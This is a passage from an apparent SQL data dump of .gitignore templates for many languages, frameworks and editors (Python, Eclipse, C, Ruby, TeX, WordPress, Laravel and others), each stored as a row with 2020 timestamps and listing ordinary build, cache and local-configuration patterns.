logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.nox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*.cover\n.hypothesis/\n.pytest_cache/\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\nlocal_settings.py\ndb.sqlite3\n\n# Flask stuff:\ninstance/\n.webassets-cache\n\n# Scrapy stuff:\n.scrapy\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# Jupyter Notebook\n.ipynb_checkpoints\n\n# IPython\nprofile_default/\nipython_config.py\n\n# pyenv\n.python-version\n\n# celery beat schedule file\ncelerybeat-schedule\n\n# SageMath parsed files\n*.sage.py\n\n# Environments\n.env\n.venv\nenv/\nvenv/\nENV/\nenv.bak/\nvenv.bak/\n\n# Spyder project settings\n.spyderproject\n.spyproject\n\n# Rope project settings\n.ropeproject\n\n# mkdocs documentation\n/site\n\n# mypy\n.mypy_cache/\n.dmypy.json\ndmypy.json\n\n# Pyre type checker\n.pyre/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(52,'Qooxdoo','cache\ncache-downloads\ninspector\napi\nsource/inspector.html\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(53,'Eclipse','\n.metadata\nbin/\ntmp/\n*.tmp\n*.bak\n*.swp\n*~.nib\nlocal.properties\n.settings/\n.loadpath\n.recommenders\n\n# External tool builders\n.externalToolBuilders/\n\n# Locally stored \"Eclipse launch configurations\"\n*.launch\n\n# PyDev specific (Python IDE for Eclipse)\n*.pydevproject\n\n# CDT-specific (C/C++ Development Tooling)\n.cproject\n\n# CDT- autotools\n.autotools\n\n# Java annotation processor (APT)\n.factorypath\n\n# PDT-specific (PHP Development Tools)\n.buildpath\n\n# sbteclipse plugin\n.target\n\n# Tern plugin\n.tern-project\n\n# TeXlipse plugin\n.texlipse\n\n# STS (Spring Tool Suite)\n.springBeans\n\n# Code Recommenders\n.recommenders/\n\n# Annotation Processing\n.apt_generated/\n\n# Scala IDE specific (Scala & Java development for Eclipse)\n.cache-main\n.scala_dependencies\n.worksheet\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(54,'Dreamweaver','# DW Dreamweaver added files\n_notes\n_compareTemp\nconfigs/\ndwsync.xml\ndw_php_codehinting.config\n*.mno\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(55,'C','# Prerequisites\n*.d\n\n# Object files\n*.o\n*.ko\n*.obj\n*.elf\n\n# Linker output\n*.ilk\n*.map\n*.exp\n\n# Precompiled Headers\n*.gch\n*.pch\n\n# Libraries\n*.lib\n*.a\n*.la\n*.lo\n\n# Shared objects (inc. Windows DLLs)\n*.dll\n*.so\n*.so.*\n*.dylib\n\n# Executables\n*.exe\n*.out\n*.app\n*.i*86\n*.x86_64\n*.hex\n\n# Debug files\n*.dSYM/\n*.su\n*.idb\n*.pdb\n\n# Kernel Module Compile Results\n*.mod*\n*.cmd\n.tmp_versions/\nmodules.order\nModule.symvers\nMkfile.old\ndkms.conf\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(56,'ArchLinuxPackages','*.tar\n*.tar.*\n*.jar\n*.exe\n*.msi\n*.zip\n*.tgz\n*.log\n*.log.*\n*.sig\n\npkg/\nsrc/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(57,'Xojo','# Xojo (formerly REALbasic and Real Studio)\n\nBuilds*\n*.debug\n*.debug.app\nDebug*.exe\nDebug*/Debug*.exe\nDebug*/Debug*\\ Libs\n*.rbuistate\n*.xojo_uistate\n*.obsolete\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(58,'D','# Compiled Object files\n*.o\n*.obj\n\n# Compiled Dynamic libraries\n*.so\n*.dylib\n*.dll\n\n# Compiled Static libraries\n*.a\n*.lib\n\n# Executables\n*.exe\n\n# DUB\n.dub\ndocs.json\n__dummy.html\ndocs/\n\n# Code coverage\n*.lst\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(59,'Zephir','# Cache files, generates by Zephir\n.temp/\n.libs/\n\n# Object files, generates by linker\n*.lo\n*.la\n*.o\n*.loT\n\n# Files generated by configure and Zephir,\n# not required for extension compilation.\next/build/\next/modules/\next/Makefile*\next/config*\next/acinclude.m4\next/aclocal.m4\next/autom4te*\next/install-sh\next/ltmain.sh\next/missing\next/mkinstalldirs\next/run-tests.php\next/.deps\next/libtool\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(60,'macOS','# General\n.DS_Store\n.AppleDouble\n.LSOverride\n\n# Icon must end with two \\r\nIcon\r\r\n\n# Thumbnails\n._*\n\n# Files that might appear in the root of a volume\n.DocumentRevisions-V100\n.fseventsd\n.Spotlight-V100\n.TemporaryItems\n.Trashes\n.VolumeIcon.icns\n.com.apple.timemachine.donotpresent\n\n# Directories potentially created on remote AFP share\n.AppleDB\n.AppleDesktop\nNetwork Trash Folder\nTemporary Items\n.apdisk\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(61,'Linux','*~\n\n# temporary files which can be created if a process still has a handle open of a deleted file\n.fuse_hidden*\n\n# KDE directory preferences\n.directory\n\n# Linux trash folder which might appear on any partition or disk\n.Trash-*\n\n# .nfs files are created when an open file is removed but is still being accessed\n.nfs*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(62,'LibreOffice','# LibreOffice locks\n.~lock.*#\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(63,'IGORPro','# Avoid including Experiment files: they can be created and edited locally to test the ipf files\n*.pxp\n*.pxt\n*.uxp\n*.uxt\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(64,'TurboGears2','*.py[co]\n\n# Default development database\ndevdata.db\n\n# Default data directory\ndata/*\n\n# Packages\n*.egg\n*.egg-info\ndist\nbuild\n\n# Installer logs\npip-log.txt\n\n# Unit test / coverage reports\n.coverage\n.tox\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(65,'R','# History files\n.Rhistory\n.Rapp.history\n\n# Session Data files\n.RData\n\n# Example code in package build process\n*-Ex.R\n\n# Output files from R CMD build\n/*.tar.gz\n\n# Output files from R CMD check\n/*.Rcheck/\n\n# RStudio files\n.Rproj.user/\n\n# produced vignettes\nvignettes/*.html\nvignettes/*.pdf\n\n# OAuth2 token, see https://github.com/hadley/httr/releases/tag/v0.3\n.httr-oauth\n\n# knitr and R markdown default cache directories\n/*_cache/\n/cache/\n\n# Temporary files created by R markdown\n*.utf8.md\n*.knit.md\n\n# Shiny token, see https://shiny.rstudio.com/articles/shinyapps.html\nrsconnect/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(66,'XilinxISE','# intermediate build files\n*.bgn\n*.bit\n*.bld\n*.cmd_log\n*.drc\n*.ll\n*.lso\n*.msd\n*.msk\n*.ncd\n*.ngc\n*.ngd\n*.ngr\n*.pad\n*.par\n*.pcf\n*.prj\n*.ptwx\n*.rbb\n*.rbd\n*.stx\n*.syr\n*.twr\n*.twx\n*.unroutes\n*.ut\n*.xpi\n*.xst\n*_bitgen.xwbt\n*_envsettings.html\n*_map.map\n*_map.mrp\n*_map.ngm\n*_map.xrpt\n*_ngdbuild.xrpt\n*_pad.csv\n*_pad.txt\n*_par.xrpt\n*_summary.html\n*_summary.xml\n*_usage.xml\n*_xst.xrpt\n\n# iMPACT generated files\n_impactbatch.log\nimpact.xsl\nimpact_impact.xwbt\nise_impact.cmd\nwebtalk_impact.xml\n\n# Core Generator generated files\nxaw2verilog.log\n\n# project-wide generated files\n*.gise\npar_usage_statistics.html\nusage_statistics_webtalk.html\nwebtalk.log\nwebtalk_pn.xml\n\n# generated folders\niseconfig/\nxlnx_auto_0_xdb/\nxst/\n_ngo/\n_xmsgs/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(67,'Typo3','## TYPO3 v6.2\n# Ignore several upload and file directories.\n/fileadmin/user_upload/\n/fileadmin/_temp_/\n/fileadmin/_processed_/\n/uploads/\n# Ignore cache\n/typo3conf/temp_CACHED*\n/typo3conf/temp_fieldInfo.php\n/typo3conf/deprecation_*.log\n/typo3conf/ENABLE_INSTALL_TOOL\n/typo3conf/realurl_autoconf.php\n/FIRST_INSTALL\n# Ignore system folders, you should have them symlinked.\n# If not comment out the following entries.\n/typo3\n/typo3_src\n/typo3_src-*\n/Packages\n/.htaccess\n/index.php\n# Ignore temp directory.\n/typo3temp/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(68,'Waf','# For projects that use the Waf build system: https://waf.io/\n# Dot-hidden on Unix-like systems\n.waf-*-*/\n.waf3-*-*/\n# Hidden directory on Windows (no dot)\nwaf-*-*/\nwaf3-*-*/\n# Lockfile\n.lock-waf_*_build\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(69,'OCaml','*.annot\n*.cmo\n*.cma\n*.cmi\n*.a\n*.o\n*.cmx\n*.cmxs\n*.cmxa\n\n# ocamlbuild working directory\n_build/\n\n# ocamlbuild targets\n*.byte\n*.native\n\n# oasis generated files\nsetup.data\nsetup.log\n\n# Merlin configuring file for Vim and Emacs\n.merlin\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(70,'Ruby','*.gem\n*.rbc\n/.config\n/coverage/\n/InstalledFiles\n/pkg/\n/spec/reports/\n/spec/examples.txt\n/test/tmp/\n/test/version_tmp/\n/tmp/\n\n# Used by dotenv library to load environment variables.\n# .env\n\n## Specific to RubyMotion:\n.dat*\n.repl_history\nbuild/\n*.bridgesupport\nbuild-iPhoneOS/\nbuild-iPhoneSimulator/\n\n## Specific to RubyMotion (use of CocoaPods):\n#\n# We recommend against adding the Pods directory to your .gitignore. However\n# you should judge for yourself, the pros and cons are mentioned at:\n# https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control\n#\n# vendor/Pods/\n\n## Documentation cache and generated files:\n/.yardoc/\n/_yardoc/\n/doc/\n/rdoc/\n\n## Environment normalization:\n/.bundle/\n/vendor/bundle\n/lib/bundler/man/\n\n# for a library or gem, you might want to ignore these files since the code is\n# intended to run in multiple environments; otherwise, check them in:\n# Gemfile.lock\n# .ruby-version\n# .ruby-gemset\n\n# unless supporting rvm < 1.11.0 or doing something fancy, ignore this:\n.rvmrc\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(71,'RhodesRhomobile','rholog-*\nsim-*\nbin/libs\nbin/RhoBundle\nbin/tmp\nbin/target\nbin/*.ap_\n*.o\n*.jar\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(72,'Idris','*.ibc\n*.o\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(73,'Redcar','.redcar\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(74,'TextMate','*.tmproj\n*.tmproject\ntmtags\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(75,'SublimeText','# Cache files for Sublime Text\n*.tmlanguage.cache\n*.tmPreferences.cache\n*.stTheme.cache\n\n# Workspace files are user-specific\n*.sublime-workspace\n\n# Project files should be checked into the repository, unless a significant\n# proportion of contributors will probably not be using Sublime Text\n# *.sublime-project\n\n# SFTP configuration file\nsftp-config.json\n\n# Package control specific files\nPackage Control.last-run\nPackage Control.ca-list\nPackage Control.ca-bundle\nPackage Control.system-ca-bundle\nPackage Control.cache/\nPackage Control.ca-certs/\nPackage Control.merged-ca-bundle\nPackage Control.user-ca-bundle\noscrypto-ca-bundle.crt\nbh_unicode_properties.cache\n\n# Sublime-github package stores a github token in this file\n# https://packagecontrol.io/packages/sublime-github\nGitHub.sublime-settings\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(76,'CodeKit','# General CodeKit files to ignore\nconfig.codekit\nconfig.codekit3\n/min\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(77,'Yii','assets/*\n!assets/.gitignore\nprotected/runtime/*\n!protected/runtime/.gitignore\nprotected/data/*.db\nthemes/classic/views/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(78,'TeX','## Core latex/pdflatex auxiliary files:\n*.aux\n*.lof\n*.log\n*.lot\n*.fls\n*.out\n*.toc\n*.fmt\n*.fot\n*.cb\n*.cb2\n.*.lb\n\n## Intermediate documents:\n*.dvi\n*.xdv\n*-converted-to.*\n# these rules might exclude image files for figures etc.\n# *.ps\n# *.eps\n# *.pdf\n\n## Generated if empty string is given at \"Please type another file name for output:\"\n.pdf\n\n## Bibliography auxiliary files (bibtex/biblatex/biber):\n*.bbl\n*.bcf\n*.blg\n*-blx.aux\n*-blx.bib\n*.run.xml\n\n## Build tool auxiliary files:\n*.fdb_latexmk\n*.synctex\n*.synctex(busy)\n*.synctex.gz\n*.synctex.gz(busy)\n*.pdfsync\n\n## Build tool directories for auxiliary files\n# latexrun\nlatex.out/\n\n## Auxiliary and intermediate files from other packages:\n# algorithms\n*.alg\n*.loa\n\n# achemso\nacs-*.bib\n\n# amsthm\n*.thm\n\n# beamer\n*.nav\n*.pre\n*.snm\n*.vrb\n\n# changes\n*.soc\n\n# comment\n*.cut\n\n# cprotect\n*.cpt\n\n# elsarticle (documentclass of Elsevier journals)\n*.spl\n\n# endnotes\n*.ent\n\n# fixme\n*.lox\n\n# feynmf/feynmp\n*.mf\n*.mp\n*.t[1-9]\n*.t[1-9][0-9]\n*.tfm\n\n#(r)(e)ledmac/(r)(e)ledpar\n*.end\n*.?end\n*.[1-9]\n*.[1-9][0-9]\n*.[1-9][0-9][0-9]\n*.[1-9]R\n*.[1-9][0-9]R\n*.[1-9][0-9][0-9]R\n*.eledsec[1-9]\n*.eledsec[1-9]R\n*.eledsec[1-9][0-9]\n*.eledsec[1-9][0-9]R\n*.eledsec[1-9][0-9][0-9]\n*.eledsec[1-9][0-9][0-9]R\n\n# glossaries\n*.acn\n*.acr\n*.glg\n*.glo\n*.gls\n*.glsdefs\n\n# gnuplottex\n*-gnuplottex-*\n\n# gregoriotex\n*.gaux\n*.gtex\n\n# htlatex\n*.4ct\n*.4tc\n*.idv\n*.lg\n*.trc\n*.xref\n\n# hyperref\n*.brf\n\n# knitr\n*-concordance.tex\n# TODO Comment the next line if you want to keep your tikz graphics files\n*.tikz\n*-tikzDictionary\n\n# listings\n*.lol\n\n# makeidx\n*.idx\n*.ilg\n*.ind\n*.ist\n\n# minitoc\n*.maf\n*.mlf\n*.mlt\n*.mtc[0-9]*\n*.slf[0-9]*\n*.slt[0-9]*\n*.stc[0-9]*\n\n# minted\n_minted*\n*.pyg\n\n# morewrites\n*.mw\n\n# nomencl\n*.nlg\n*.nlo\n*.nls\n\n# pax\n*.pax\n\n# pdfpcnotes\n*.pdfpc\n\n# sagetex\n*.sagetex.sage\n*.sagetex.py\n*.sagetex.scmd\n\n# scrwfile\n*.wrt\n\n# sympy\n*.sout\n*.sympy\nsympy-plots-for-*.tex/\n\n# pdfcomment\n*.upa\n*.upb\n\n# pythontex\n*.pytxcode\npythontex-files-*/\n\n# tcolorbox\n*.listing\n\n# thmtools\n*.loe\n\n# TikZ & PGF\n*.dpth\n*.md5\n*.auxlock\n\n# todonotes\n*.tdo\n\n# easy-todo\n*.lod\n\n# xcolor\n*.xcp\n\n# xmpincl\n*.xmpi\n\n# xindy\n*.xdy\n\n# xypic precompiled matrices\n*.xyc\n\n# endfloat\n*.ttt\n*.fff\n\n# Latexian\nTSWLatexianTemp*\n\n## Editors:\n# WinEdt\n*.bak\n*.sav\n\n# Texpad\n.texpadtmp\n\n# LyX\n*.lyx~\n\n# Kile\n*.backup\n\n# KBibTeX\n*~[0-9]*\n\n# auto folder when using emacs and auctex\n./auto/*\n*.el\n\n# expex forward references with \\gathertags\n*-tags.tex\n\n# standalone packages\n*.sta\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(79,'Julia','*.jl.cov\n*.jl.*.cov\n*.jl.mem\ndeps/deps.jl\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(80,'PSoCCreator','# Project Settings\n*.cywrk.*\n*.cyprj.*\n\n# Generated Assets and Resources\nDebug/\nRelease/\nExport/\n*/codegentemp\n*/Generated_Source\n*_datasheet.pdf\n*_timing.html\n*.cycdx\n*.cyfit\n*.rpt\n*.svd\n*.log\n*.zip\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(81,'Magento','#--------------------------#\n# Magento Default Files #\n#--------------------------#\n\n/PATCH_*.sh\n\n/app/etc/local.xml\n\n/media/*\n!/media/.htaccess\n\n!/media/customer\n/media/customer/*\n!/media/customer/.htaccess\n\n!/media/dhl\n/media/dhl/*\n!/media/dhl/logo.jpg\n\n!/media/downloadable\n/media/downloadable/*\n!/media/downloadable/.htaccess\n\n!/media/xmlconnect\n/media/xmlconnect/*\n\n!/media/xmlconnect/custom\n/media/xmlconnect/custom/*\n!/media/xmlconnect/custom/ok.gif\n\n!/media/xmlconnect/original\n/media/xmlconnect/original/*\n!/media/xmlconnect/original/ok.gif\n\n!/media/xmlconnect/system\n/media/xmlconnect/system/*\n!/media/xmlconnect/system/ok.gif\n\n/var/*\n!/var/.htaccess\n\n!/var/package\n/var/package/*\n!/var/package/*.xml\n\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(82,'Android','# Built application files\n*.apk\n*.ap_\n*.aab\n\n# Files for the ART/Dalvik VM\n*.dex\n\n# Java class files\n*.class\n\n# Generated files\nbin/\ngen/\nout/\n\n# Gradle files\n.gradle/\nbuild/\n\n# Local configuration file (sdk path, etc)\nlocal.properties\n\n# Proguard folder generated by Eclipse\nproguard/\n\n# Log Files\n*.log\n\n# Android Studio Navigation editor temp files\n.navigation/\n\n# Android Studio captures folder\ncaptures/\n\n# IntelliJ\n*.iml\n.idea/workspace.xml\n.idea/tasks.xml\n.idea/gradle.xml\n.idea/assetWizardSettings.xml\n.idea/dictionaries\n.idea/libraries\n.idea/caches\n\n# Keystore files\n# Uncomment the following lines if you do not want to check your keystore files in.\n#*.jks\n#*.keystore\n\n# External native build folder generated in Android Studio 2.2 and later\n.externalNativeBuild\n\n# Google Services (e.g. APIs or Firebase)\ngoogle-services.json\n\n# Freeline\nfreeline.py\nfreeline/\nfreeline_project_description.json\n\n# fastlane\nfastlane/report.xml\nfastlane/Preview.html\nfastlane/screenshots\nfastlane/test_output\nfastlane/readme.md\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(83,'WordPress','*.log\nwp-config.php\nwp-content/advanced-cache.php\nwp-content/backup-db/\nwp-content/backups/\nwp-content/blogs.dir/\nwp-content/cache/\nwp-content/upgrade/\nwp-content/uploads/\nwp-content/mu-plugins/\nwp-content/wp-cache-config.php\nwp-content/plugins/hello.php\n\n/.htaccess\n/license.txt\n/readme.html\n/sitemap.xml\n/sitemap.xml.gz\n\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(84,'Umbraco','## Ignore Umbraco files/folders generated for each instance\n##\n## Get latest from https://github.com/github/gitignore/blob/master/Umbraco.gitignore\n\n# Note: VisualStudio gitignore rules may also be relevant\n\n# Umbraco\n# Ignore unimportant folders generated by Umbraco\n**/App_Data/Logs/\n**/App_Data/[Pp]review/\n**/App_Data/TEMP/\n**/App_Data/NuGetBackup/\n\n# Ignore Umbraco content cache file\n**/App_Data/umbraco.config\n\n# Don\'t ignore Umbraco packages (VisualStudio.gitignore mistakes this for a NuGet packages folder)\n# Make sure to include details from VisualStudio.gitignore BEFORE this\n!**/App_Data/[Pp]ackages/*\n!**/[Uu]mbraco/[Dd]eveloper/[Pp]ackages/*\n\n# ImageProcessor DiskCache\n**/App_Data/cache/\n\n# Ignore the Models Builder models out of date flag\n**/App_Data/Models/ood.flag\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(85,'ForceDotCom','.project\n.settings\nsalesforce.schema\nReferenced Packages\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(86,'C++','# Prerequisites\n*.d\n\n# Compiled Object files\n*.slo\n*.lo\n*.o\n*.obj\n\n# Precompiled Headers\n*.gch\n*.pch\n\n# Compiled Dynamic libraries\n*.so\n*.dylib\n*.dll\n\n# Fortran module files\n*.mod\n*.smod\n\n# Compiled Static libraries\n*.lai\n*.la\n*.a\n*.lib\n\n# Executables\n*.exe\n*.out\n*.app\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(87,'Matlab','# Windows default autosave extension\n*.asv\n\n# OSX / *nix default autosave extension\n*.m~\n\n# Compiled MEX binaries (all platforms)\n*.mex*\n\n# Packaged app and toolbox files\n*.mlappinstall\n*.mltbx\n\n# Generated helpsearch folders\nhelpsearch*/\n\n# Simulink code generation folders\nslprj/\nsccprj/\n\n# Matlab code generation folders\ncodegen/\n\n# Simulink autosave extension\n*.autosave\n\n# Octave session info\noctave-workspace\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(88,'Prestashop','# Private files\n# The following files contain your database credentials and other personal data.\n\nconfig/settings.*.php\n\n# Cache, temp and generated files\n# The following files are generated by PrestaShop.\n\nadmin-dev/autoupgrade/\n/cache/*\n!/cache/index.php\n!/cache/*/\n/cache/*/*\n!/cache/cachefs/index.php\n!/cache/purifier/index.php\n!/cache/push/index.php\n!/cache/sandbox/index.php\n!/cache/smarty/index.php\n!/cache/tcpdf/index.php\nconfig/xml/*.xml\n/log/*\n*sitemap.xml\nthemes/*/cache/\nmodules/*/config*.xml\n\n# Site content\n# The following folders contain product images, virtual products, CSV\'s, etc.\n\nadmin-dev/backups/\nadmin-dev/export/\nadmin-dev/import/\ndownload/\n/img/*\nupload/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(89,'Dart','# See https://www.dartlang.org/guides/libraries/private-files\n\n# Files and directories created by pub\n.dart_tool/\n.packages\nbuild/\n# If you\'re building an application, you may want to check-in your pubspec.lock\npubspec.lock\n\n# Directory created by dartdoc\n# If you don\'t generate documentation locally you can remove this line.\ndoc/api/\n\n# Avoid committing generated Javascript files:\n*.dart.js\n*.info.json # Produced by the --dump-info flag.\n*.js # When generated by dart2js. Don\'t specify *.js if your\n # project includes source files written in JavaScript.\n*.js_\n*.js.deps\n*.js.map\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(90,'Delphi','# Uncomment these types if you want even more clean repository. But be careful.\n# It can make harm to an existing project source. Read explanations below.\n#\n# Resource files are binaries containing manifest, project icon and version info.\n# They can not be viewed as text or compared by diff-tools. Consider replacing them with .rc files.\n#*.res\n#\n# Type library file (binary). In old Delphi versions it should be stored.\n# Since Delphi 2009 it is produced from .ridl file and can safely be ignored.\n#*.tlb\n#\n# Diagram Portfolio file. Used by the diagram editor up to Delphi 7.\n# Uncomment this if you are not using diagrams or use newer Delphi version.\n#*.ddp\n#\n# Visual LiveBindings file. Added in Delphi XE2.\n# Uncomment this if you are not using LiveBindings Designer.\n#*.vlb\n#\n# Deployment Manager configuration file for your project. Added in Delphi XE2.\n# Uncomment this if it is not mobile development and you do not use remote debug feature.\n#*.deployproj\n#\n# C++ object files produced when C/C++ Output file generation is configured.\n# Uncomment this if you are not using external objects (zlib library for example).\n#*.obj\n#\n\n# Delphi compiler-generated binaries (safe to delete)\n*.exe\n*.dll\n*.bpl\n*.bpi\n*.dcp\n*.so\n*.apk\n*.drc\n*.map\n*.dres\n*.rsm\n*.tds\n*.dcu\n*.lib\n*.a\n*.o\n*.ocx\n\n# Delphi autogenerated files (duplicated info)\n*.cfg\n*.hpp\n*Resource.rc\n\n# Delphi local files (user-specific info)\n*.local\n*.identcache\n*.projdata\n*.tvsconfig\n*.dsk\n\n# Delphi history and backups\n__history/\n__recovery/\n*.~*\n\n# Castalia statistics file (since XE7 Castalia is distributed with Delphi)\n*.stat\n\n# Boss dependency manager vendor folder https://github.com/HashLoad/boss\nmodules/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(91,'Textpattern','.htaccess\ncss.php\nrpc/\nsites/site*/admin/\nsites/site*/private/\nsites/site*/public/admin/\nsites/site*/public/setup/\nsites/site*/public/theme/\ntextpattern/\nHISTORY.txt\nREADME.txt\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(92,'Xcode','# Xcode\n#\n# gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore\n\n## Build generated\nbuild/\nDerivedData/\n\n## Various settings\n*.pbxuser\n!default.pbxuser\n*.mode1v3\n!default.mode1v3\n*.mode2v3\n!default.mode2v3\n*.perspectivev3\n!default.perspectivev3\nxcuserdata/\n\n## Other\n*.moved-aside\n*.xccheckout\n*.xcscmblueprint\n\n## Obj-C/Swift specific\n*.hmap\n*.ipa\n*.dSYM.zip\n*.dSYM\n\n## Playgrounds\ntimeline.xctimeline\nplayground.xcworkspace\n\n# Swift Package Manager\n#\n# Add this line if you want to avoid checking in source code from Swift Package Manager dependencies.\n# Packages/\n# Package.pins\n# Package.resolved\n.build/\n\n# CocoaPods\n#\n# We recommend against adding the Pods directory to your .gitignore. However\n# you should judge for yourself, the pros and cons are mentioned at:\n# https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control\n#\n# Pods/\n#\n# Add this line if you want to avoid checking in source code from the Xcode workspace\n# *.xcworkspace\n\n# Carthage\n#\n# Add this line if you want to avoid checking in source code from Carthage dependencies.\n# Carthage/Checkouts\n\nCarthage/Build\n\n# fastlane\n#\n# It is recommended to not store the screenshots in the git repo. Instead, use fastlane to re-generate the\n# screenshots whenever they are needed.\n# For more information about the recommended setup visit:\n# https://docs.fastlane.tools/best-practices/source-control/#source-control\n\nfastlane/report.xml\nfastlane/Preview.html\nfastlane/screenshots/**/*.png\nfastlane/test_output\n\n# Code Injection\n#\n# After new code Injection tools there\'s a generated folder /iOSInjectionProject\n# https://github.com/johnno1962/injectionforxcode\n\niOSInjectionProject/\n\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(93,'EiffelStudio','# The compilation directory\nEIFGENs\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(94,'EPiServer','######################\n## EPiServer Files\n######################\n*License.config\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(95,'Diff','*.patch\n*.diff\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(96,'Patch','*.orig\n*.rej\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(97,'Plone','*.pyc\n*.pyo\n*.tmp*\n*.mo\n*.egg\n*.EGG\n*.egg-info\n*.EGG-INFO\n.*.cfg\nbin/\nbuild/\ndevelop-eggs/\ndownloads/\neggs/\nfake-eggs/\nparts/\ndist/\nvar/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(98,'Momentics','# Built files\nx86/\narm/\narm-p/\ntranslations/*.qm\n\n# IDE settings\n.settings/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(99,'Java','# Compiled class file\n*.class\n\n# Log file\n*.log\n\n# BlueJ files\n*.ctxt\n\n# Mobile Tools for Java (J2ME)\n.mtj.tmp/\n\n# Package Files #\n*.jar\n*.war\n*.nar\n*.ear\n*.zip\n*.tar.gz\n*.rar\n\n# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml\nhs_err_pid*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(100,'DartEditor','.project\n.buildlog\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(101,'SVN','.svn/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(102,'Laravel','/vendor/\nnode_modules/\nnpm-debug.log\nyarn-error.log\n\n# Laravel 4 specific\nbootstrap/compiled.php\napp/storage/\n\n# Laravel 5 & Lumen specific\npublic/storage\npublic/hot\nstorage/*.key\n.env\nHomestead.yaml\nHomestead.json\n/.vagrant\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(103,'TortoiseGit','# Project-level settings\n/.tgitconfig\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(104,'Godot','\n# Godot-specific ignores\n.import/\nexport.cfg\nexport_presets.cfg\n\n# Mono-specific ignores\n.mono/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(105,'Symfony','# Cache and logs (Symfony2)\n/app/cache/*\n/app/logs/*\n!app/cache/.gitkeep\n!app/logs/.gitkeep\n\n# Email spool folder\n/app/spool/*\n\n# Cache, session files and logs (Symfony3)\n/var/cache/*\n/var/logs/*\n/var/sessions/*\n!var/cache/.gitkeep\n!var/logs/.gitkeep\n!var/sessions/.gitkeep\n\n# Logs (Symfony4)\n/var/log/*\n!var/log/.gitkeep\n\n# Parameters\n/app/config/parameters.yml\n/app/config/parameters.ini\n\n# Managed by Composer\n/app/bootstrap.php.cache\n/var/bootstrap.php.cache\n/bin/*\n!bin/console\n!bin/symfony_requirements\n/vendor/\n\n# Assets and user uploads\n/web/bundles/\n/web/uploads/\n\n# PHPUnit\n/app/phpunit.xml\n/phpunit.xml\n\n# Build data\n/build/\n\n# Composer PHAR\n/composer.phar\n\n# Backup entities generated with doctrine:generate:entities command\n**/Entity/*~\n\n# Embedded web-server pid file\n/.web-server-pid\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(106,'SketchUp','*.skb\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(107,'DM','*.dmb\n*.rsc\n*.int\n*.lk\n*.zip\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(108,'Elisp','# Compiled\n*.elc\n\n# Packaging\n.cask\n\n# Backup files\n*~\n\n# Undo-tree save-files\n*.~undo-tree\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(109,'Grails','# .gitignore for Grails 1.2 and 1.3\n# Although this should work for most versions of grails, it is\n# suggested that you use the \"grails integrate-with --git\" command\n# to generate your .gitignore file.\n\n# web application files\n/web-app/WEB-INF/classes\n\n# default HSQL database files for production mode\n/prodDb.*\n\n# general HSQL database files\n*Db.properties\n*Db.script\n\n# logs\n/stacktrace.log\n/test/reports\n/logs\n\n# project release file\n/*.war\n\n# plugin release files\n/*.zip\n/plugin.xml\n\n# older 